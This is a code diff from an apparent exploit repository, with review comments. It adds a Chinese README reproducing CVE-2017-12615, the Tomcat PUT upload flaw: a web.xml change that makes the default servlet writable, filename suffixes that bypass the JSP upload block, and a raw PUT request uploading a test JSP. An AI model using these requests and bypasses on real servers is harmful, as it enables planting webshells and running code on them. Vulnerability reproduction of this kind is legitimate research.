Original file line number Diff line number Diff line change 11#! -*- coding:utf-8 -*-
22__author__ = "浮萍"
3- __Date__ = "20170914 "
3+ __Date__ = "20170920 "
44
55
66'''
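Review bot: The only change in this file is the hand-edited `__Date__` bump on line 3, so the hunk gives no indication of what behaviour changed between 20170914 and 20170920. A manually maintained date drifts from the commit history; consider dropping `__Date__` and relying on the commit log, or noting what changed in the module docstring that opens on line 6. Separately, line 1 reads `#! -*- coding:utf-8 -*-`: Python still picks up the encoding, but the `#!` prefix makes it an invalid interpreter line if the script is executed directly, so `# -*- coding: utf-8 -*-` would be safer.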
Original file line number Diff line number Diff line change 1+ # CVE-2017 -12615
2+ 打开tomcat下conf\web.xml文件
3+ 找到
4+ ```
5+ <servlet>
6+ <servlet-name>default</servlet-name>
7+ <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
8+ <init-param>
9+ <param-name>debug</param-name>
10+ <param-value>0</param-value>
11+ </init-param>
12+ <init-param>
13+ <param-name>listings</param-name>
14+ <param-value>false</param-value>
15+ </init-param>
16+ <load-on-startup>1</load-on-startup>
17+ </servlet>
18+
19+ ```
20+ 添加` readonly ` 为false
21+ ```
22+ <servlet>
23+ <servlet-name>default</servlet-name>
24+ <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
25+ <init-param>
26+ <param-name>debug</param-name>
27+ <param-value>0</param-value>
28+ </init-param>
29+ <init-param>
30+ <param-name>listings</param-name>
31+ <param-value>false</param-value>
32+ </init-param>
33+ <init-param>
34+ <param-name>readonly</param-name>
35+ <param-value>false</param-value>
36+ </init-param>
37+ <load-on-startup>1</load-on-startup>
38+ </servlet>
39+
40+ ```
41+
42+ 不能直接put jsp或者jspx文件
43+ 在windows下可以用` test.jsp/ ` 、` test.jsp/. ` 、` test.jsp::$DATA ` 来绕过
44+ 经过测试,最新版[ apache-tomcat-7.0.81] ( http://tomcat.apache.org/download-70.cgi ) 可以用` test.jsp/ ` 、` test.jsp/. ` 来绕过
45+
46+ ```
47+ PUT /test.jsp/ HTTP/1.1
48+ Host: 192.168.135.132:8080
49+ Content-Length: 25
50+
51+ <%out.println("test");%>
52+
53+ ```
54+ ![ 最新版利用] ( https://raw.githubusercontent.com/fupinglee/MyPython/master/exploit/CVE-2017-12615/tomcat-7.0.81.jpg )
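Review bot: README line 20 tells the reader to set `readonly` to `false` on the default servlet without stating that this is a deliberately weakened lab setting; Tomcat's DefaultServlet defaults `readonly` to true, and that default is what rejects PUT. Say explicitly that the change is only for reproducing the issue on a test instance, and add a remediation line (remove the `readonly` init-param or set it to `true`, and keep PUT disabled where uploads are not needed). Line 44 reports a result on apache-tomcat-7.0.81 but, unlike line 43, does not say which operating system it was tested on; add that so the finding can be checked. The two `<servlet>` blocks differ only in lines 33-36, so showing just the added `<init-param>` would make the change easier to see.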